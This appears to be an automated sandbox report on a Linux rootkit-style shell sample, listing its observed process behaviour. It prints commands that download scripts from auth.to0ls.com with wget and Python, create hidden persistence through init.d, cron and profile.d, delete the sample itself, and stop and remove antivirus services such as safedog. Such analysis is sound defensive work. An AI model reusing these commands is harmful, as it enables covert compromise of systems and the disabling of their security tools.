Source: /bin/bash (PID: 19618)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19619)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19640)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19641)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19677)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19678)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19709)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19710)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19749)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19750)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19764)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19765)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19797)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19798)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19828)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19829)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19864)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19865)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19884)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19885)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19916)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19917)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19949)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19950)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19981)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19982)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20016)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20017)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20050)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20051)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20082)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20083)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20114)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20115)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20148)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20149)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20179)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20180)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20211)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20212)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20226)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20227)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20257)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20258)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20281)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20282)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20313)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20314)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20333)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20337)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20366)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20367)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20401)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20402)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20435)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20436)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20463)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20464)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20481)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20482)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20516)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20517)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20551)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20552)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20565)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20566)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20600)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20601)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20625)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20626)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20647)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20648)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20680)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20681)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20716)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20717)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20727)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20728)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20760)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20761)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20782)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20783)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20816)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20817)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20830)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20831)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20865)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20866)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20900)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20901)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20933)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20934)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20953)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20954)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20988)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20989)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21000)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21001)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21033)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21034)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21058)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21059)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21072)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21073)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21111)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21112)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21125)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21126)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21165)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21166)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21197)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21198)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21216)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21217)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21229)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21230)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21253)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21254)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21282)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21283)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21313)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21314)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21354)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21355)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21389)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21390)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21420)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21421)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21436)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21437)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21468)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21469)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21489)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21490)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21512)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21513)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21545)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21546)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21582)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21583)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21613)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21614)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21646)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21647)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21669)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21670)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 21696)	Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 21697)	Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/sh (PID: 21723)	Grep executable: /bin/grep -> grep -v ,
Source: /bin/sh (PID: 21794)	Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21801)	Grep executable: /bin/grep -> grep ,
Source: /bin/sh (PID: 21816)	Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21832)	Grep executable: /bin/grep -> grep -o [0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}
Source: /bin/sh (PID: 21843)	Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21845)	Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21846)	Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21866)	Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21868)	Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21869)	Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21887)	Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21889)	Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21890)	Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21909)	Grep executable: /bin/grep -> grep ssh
Source: /bin/sh (PID: 21911)	Grep executable: /bin/grep -> grep -v -
Source: /bin/sh (PID: 21912)	Grep executable: /bin/grep -> grep -v /
Source: /bin/sh (PID: 21930)	Grep executable: /bin/grep -> grep -v 127.0.0.1
Source: /bin/sh (PID: 21931)	Grep executable: /bin/grep -> grep -v localhost
Source: /bin/bash (PID: 22249)	Grep executable: /bin/grep -> grep /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 22250)	Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22539)	Grep executable: /bin/grep -> grep /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22541)	Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 22612)	Grep executable: /bin/grep -> grep c04dceb4c769b2c8823cbf39f3055e6d
Source: /bin/bash (PID: 22650)	Grep executable: /bin/grep -> grep ad593f6a17598bdd12fd3bd0f3b2a925
Source: /bin/bash (PID: 23709)	Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23737)	Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23764)	Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23793)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23796)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23799)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23805)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23819)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23845)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23857)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23868)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23876)	Grep executable: /bin/grep -> grep Content-Length:
Source: /bin/bash (PID: 23893)	Grep executable: /bin/grep -> grep -ao ver= /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23900)	Grep executable: /bin/grep -> grep -ao ver=1.0 /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23927)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23948)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23954)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23986)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23989)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 23995)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24037)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24045)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24079)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24090)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24119)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24127)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24156)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24174)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24195)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24198)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify
Source: /bin/bash (PID: 24212)	Grep executable: /bin/grep -> grep /usr/lib/.../kacpi_notify

Executes the "mkdir" command used to create folders

Show sources

Source: /bin/bash (PID: 19367)	Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 19495)	Mkdir executable: /bin/mkdir -> mkdir -p /usr/lib/... -m 0777
Source: /bin/bash (PID: 22550)	Mkdir executable: /bin/mkdir -> mkdir -p /tmp/... -m 0777
Source: /tmp/.../install.sh (PID: 23617)	Mkdir executable: /bin/mkdir -> mkdir -p /usr/include/... -m 0777

Executes the "nohup" (no hangup) command used to avoid background terminal process from being killed

Show sources

Source: /bin/bash (PID: 19422)	Nohup executable: /usr/bin/nohup -> nohup /bin/bash diskmanagerd /sbin/init
Source: /bin/bash (PID: 21716)	Nohup executable: /usr/bin/nohup -> nohup /tmp/.helpdd

Executes the "ping" command used for connectivity testing via ICMP

Show sources

Source: /bin/bash (PID: 19340)	Ping executable: /bin/ping -> ping auth.to0ls.com -c1
Source: /bin/bash (PID: 19467)	Ping executable: /bin/ping -> ping auth.to0ls.com -c1

Executes the "python" command used to interpret Python scripts

Show sources

Source: /bin/bash (PID: 23739)

Python executable: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"

Executes the "rm" command used to delete files or directories

Show sources

Source: /bin/bash (PID: 19406)	Rm executable: /bin/rm -> rm -f /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19418)	Rm executable: /bin/rm -> rm -f /tmp/1EC6U55yrZ
Source: /bin/bash (PID: 21703)	Rm executable: /bin/rm -> rm -f /tmp/.h
Source: /bin/sh (PID: 21950)	Rm executable: /bin/rm -> rm -rf /tmp/.hh
Source: /bin/bash (PID: 22136)	Rm executable: /bin/rm -> rm -f /tmp/.helpdd
Source: /bin/bash (PID: 22560)	Rm executable: /bin/rm -> rm -f /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22613)	Rm executable: /bin/rm -> rm -f /tmp/.../install.sh
Source: /bin/bash (PID: 23682)	Rm executable: /bin/rm -> rm -rf /tmp/.../
Source: /bin/bash (PID: 23683)	Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23710)	Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23738)	Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23765)	Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /bin/bash (PID: 23914)	Rm executable: /bin/rm -> rm -f /tmp/vxbkyxrlq2hly2s
Source: /tmp/.../install.sh (PID: 23645)	Rm executable: /bin/rm -> rm -f brootkit.sh
Source: /tmp/.../install.sh (PID: 23648)	Rm executable: /bin/rm -> rm -f /tmp/.../install.sh

Executes the "systemctl" command used for controlling the systemd system and service manager

Show sources

Source: /usr/sbin/update-rc.d (PID: 22389)

Systemctl executable: /bin/systemctl -> systemctl daemon-reload

Executes the "touch" command used to create files or modify time stamps

Show sources

Source: /bin/bash (PID: 23782)

Touch executable: /usr/bin/touch -> touch /tmp/vxbkyxrlq2hly2s

Executes the "wget" command typically used for HTTP/S downloading

Show sources

Source: /bin/bash (PID: 22572)	Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614)	Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684)	Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt

Sample tries to set the executable flag

Show sources

Source: /bin/mkdir (PID: 19367)	File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19368)	File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 19413)	File: /usr/lib/.../diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19496)	File: /usr/lib/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 21709)	File: /tmp/.helpdd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22267)	File: /etc/init.d/diskmanagerd (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22536)	File: /etc/cron.hourly/gcc4lef.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 22550)	File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22554)	File: /tmp/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 22651)	File: /tmp/.../brootkit.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 22652)	File: /tmp/.../install.sh (bits: - usr: rx grp: rx all: rwx)
Source: /bin/mkdir (PID: 23617)	File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/chmod (PID: 23638)	File: /usr/include/... (bits: - usr: rwx grp: rwx all: rwx)

Writes shell script file to disk with an unusual file extension

Show sources

Source: /bin/cp (PID: 19407)	Writes shell script file to disk with an unusual file extension: /usr/lib/.../diskmanagerd	Jump to dropped file
Source: /bin/bash (PID: 19422)	Writes shell script file to disk with an unusual file extension: /etc/init.d/diskmanagerd	Jump to dropped file
Source: /bin/cp (PID: 22527)	Writes shell script file to disk with an unusual file extension: /lib/libterminfo.so	Jump to dropped file

Writes shell script files to disk

Show sources

Source: /bin/bash (PID: 19422)	Shell script file created: /etc/cron.hourly/gcc4lef.sh	Jump to dropped file
Source: /usr/bin/wget (PID: 22572)	Shell script file created: /tmp/.../brootkit.sh	Jump to dropped file
Source: /usr/bin/wget (PID: 22614)	Shell script file created: /tmp/.../install.sh	Jump to dropped file
Source: /bin/cp (PID: 23621)	Shell script file created: /usr/include/.../brootkit.sh	Jump to dropped file
Source: /bin/cp (PID: 23641)	Shell script file created: /etc/profile.d/emacs.sh	Jump to dropped file

Executes the "awk" command used to scan for patterns (typically in standard output)

Show sources

Source: /bin/bash (PID: 19342)	Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/bash (PID: 19469)	Awk executable: /usr/bin/awk -> awk "{ print $3 }"
Source: /bin/sh (PID: 21724)	Awk executable: /usr/bin/awk -> awk "{print $1}"
Source: /bin/sh (PID: 21795)	Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21802)	Awk executable: /usr/bin/awk -> awk -F, "{print $1}"
Source: /bin/sh (PID: 21844)	Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21867)	Awk executable: /usr/bin/awk -> awk "{print $3}"
Source: /bin/sh (PID: 21888)	Awk executable: /usr/bin/awk -> awk "{print $2}"
Source: /bin/sh (PID: 21910)	Awk executable: /usr/bin/awk -> awk "{print $3}"

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Show sources

Source: /bin/bash (PID: 19422)	File: /etc/init.d/diskmanagerd	Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/init.d/.depend.boot	Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/init.d/.depend.start	Jump to dropped file
Source: /usr/lib/insserv/insserv (PID: 22367)	File: /etc/init.d/.depend.stop	Jump to dropped file

Sample deletes itself

Show sources

Source: /bin/rm (PID: 19418)	File: /tmp/1EC6U55yrZ
Source: /bin/rm (PID: 22613)	File: /tmp/.../install.sh
Source: /bin/rm (PID: 23648)	File: /tmp/.../install.sh

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes

Show sources

Source: /bin/bash (PID: 21717)	Sleep executable: /bin/sleep -> sleep 5
Source: /bin/bash (PID: 22655)	Sleep executable: /bin/sleep -> sleep 5

Uses the "uname" system call to query kernel version information (possible evasion)

Show sources

Source: /bin/bash (PID: 19326)	Queries kernel information via 'uname':
Source: /bin/ping (PID: 19340)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 19422)	Queries kernel information via 'uname':
Source: /bin/ping (PID: 19467)	Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22572)	Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 22614)	Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 23684)	Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 23711)	Queries kernel information via 'uname':
Source: /usr/bin/python (PID: 23739)	Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21967)	Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21973)	Queries kernel information via 'uname':
Source: /usr/bin/ssh (PID: 21982)	Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/systemd-gpt-auto-generator (PID: 22426)	Queries kernel information via 'uname':
Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427)	Queries kernel information via 'uname':
Source: /tmp/.../install.sh (PID: 22654)	Queries kernel information via 'uname':

Lowering of HIPS / PFW / Operating System Security Settings:

Sample contains AV-related strings

Show sources

Source: 1EC6U55yrZ	safedog: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	aegis: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	yunsuo: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	clamd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	avast: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	avgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	cmdavd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	cmdmgd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	drweb-configd: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	drweb-spider-kmod: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	esets: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	xmirrord: ServiceNameArray=("safedog" "aegis" "yunsuo" "clamd" "avast" "avgd" "cmdavd" "cmdmgd" "drweb-configd" "drweb-spider-kmod" "esets" "xmirrord")
Source: 1EC6U55yrZ	safedog: "safedog" )
Source: 1EC6U55yrZ	safedog: service safedog stop >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: 1EC6U55yrZ	safedog: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
